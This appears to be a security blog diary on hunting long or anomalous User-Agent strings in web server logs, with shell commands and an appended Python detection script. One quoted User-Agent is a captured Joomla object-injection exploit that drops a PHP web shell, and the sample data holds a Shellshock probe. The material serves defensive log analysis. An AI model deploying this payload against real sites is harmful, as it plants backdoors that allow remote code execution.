
What is your most unusual User-Agent?

Published: 2016-06-29
Last Updated: 2016-06-29 00:55:34 UTC
by Johannes Ullrich (Version: 1)

When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest ones that I can find in my logs. First of all: how?

First, I am extracting the User Agent string from my web server access log:

cut -f 6 -d'"' access_log > /tmp/useragents
(this may look different for you if you use a different log format)

Next, sorting the result by line length:

cat /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- | uniq

So finally, some of the "winners":

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...)
OWASMIME/4.0500 is repeated many times. No idea what this is about. A buggy script?
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;
O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;
a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;
s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22.
chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='')
{\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']);
@eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22);
JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;
s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9

An exploit for an OLD Joomla issue if I remember right? This stuff still works?

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; GWX:MANAGED; GWX:DOWNLOADED; GWX:QUALIFIED; InfoPath.3; MALCJS; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)

Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...

Oddly enough, no shell shock today. 
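As an added example (not code from the diary or from the ISC), the following Python script does the same extraction and length ranking as the cut/awk pipeline above, and then checks each distinct User-Agent for the three oddities discussed here: a serialized PHP object marker like the one in the Joomla payload, the same token repeated over and over like the Outlook string, and the Shellshock function-definition prefix. The log lines, the regex signatures, the repeat threshold and the 512-byte length cutoff are all constructed assumptions for illustration, not values taken from the diary.

```python
import re
from collections import Counter

# Constructed sample lines in the "combined" access log format; not real traffic.
# Quotes inside the User-Agent are escaped the way nginx does it (\x22), which is
# why splitting on the raw '"' character, as the cut command does, still works.
SAMPLE_LOG = r'''
203.0.113.5 - - [29/Jun/2016:00:10:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
203.0.113.6 - - [29/Jun/2016:00:10:12 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}}"
203.0.113.7 - - [29/Jun/2016:00:10:13 +0000] "GET /owa/ HTTP/1.1" 401 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)"
203.0.113.8 - - [29/Jun/2016:00:10:14 +0000] "GET /cgi-bin/status HTTP/1.1" 404 0 "-" "() { :; }; echo probe"
'''

# Combined log format: host ident user [time] "request" status bytes "referer" "user-agent".
# Each quoted field allows backslash escapes so both Apache's \" and nginx's \x22 parse.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)


def extract_user_agents(log_text):
    """Return the User-Agent field of every parseable line; unparseable lines are skipped."""
    uas = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if m:
            uas.append(m.group('ua'))
    return uas


def longest_user_agents(log_text, limit=10):
    """Distinct User-Agents sorted longest first: the same ranking the awk|sort|uniq pipeline gives."""
    ranked = sorted(set(extract_user_agents(log_text)), key=len, reverse=True)
    return ranked if limit is None else ranked[:limit]


# Assumed signatures for the three oddities in the diary (constructed, not from the page).
PHP_OBJECT_RE = re.compile(r'O:\d+:(?:\\x22|\\"|")')  # serialized PHP object, e.g. O:21:"JDatabaseDriverMysqli"
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')               # the "() {" prefix Shellshock probes carry
REPEAT_THRESHOLD = 3                                   # same ';'/paren-separated token this many times


def flag_user_agent(ua, max_len=512):
    """Return the reasons a User-Agent looks anomalous; an empty list means nothing was flagged."""
    reasons = []
    if len(ua) > max_len:
        reasons.append('overlong')
    if PHP_OBJECT_RE.search(ua):
        reasons.append('php-serialized-object')
    if SHELLSHOCK_RE.search(ua):
        reasons.append('shellshock-pattern')
    # Split on the separators browsers use inside a UA and count duplicate tokens.
    tokens = [t.strip() for t in re.split(r'[;()]', ua) if t.strip()]
    if tokens:
        top_token, count = Counter(tokens).most_common(1)[0]
        if count >= REPEAT_THRESHOLD:
            reasons.append('repeated-token:%s x%d' % (top_token, count))
    return reasons


def flagged_user_agents(log_text):
    """Map each distinct flagged User-Agent to its reasons, longest first."""
    report = {}
    for ua in longest_user_agents(log_text, limit=None):
        reasons = flag_user_agent(ua)
        if reasons:
            report[ua] = reasons
    return report


if __name__ == '__main__':
    for ua, reasons in flagged_user_agents(SAMPLE_LOG).items():
        print('%4d  %-25s  %s' % (len(ua), ','.join(reasons), ua[:70]))
```

Pointing the script at a real log is a matter of reading the file into `flagged_user_agents`; the regex only accepts the combined format, so lines in another format are silently skipped rather than mis-parsed, which is the same caveat the diary makes about the cut field number.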

What is your longest User-Agent if you search your weblogs?

---
Johannes B. Ullrich, Ph.D.
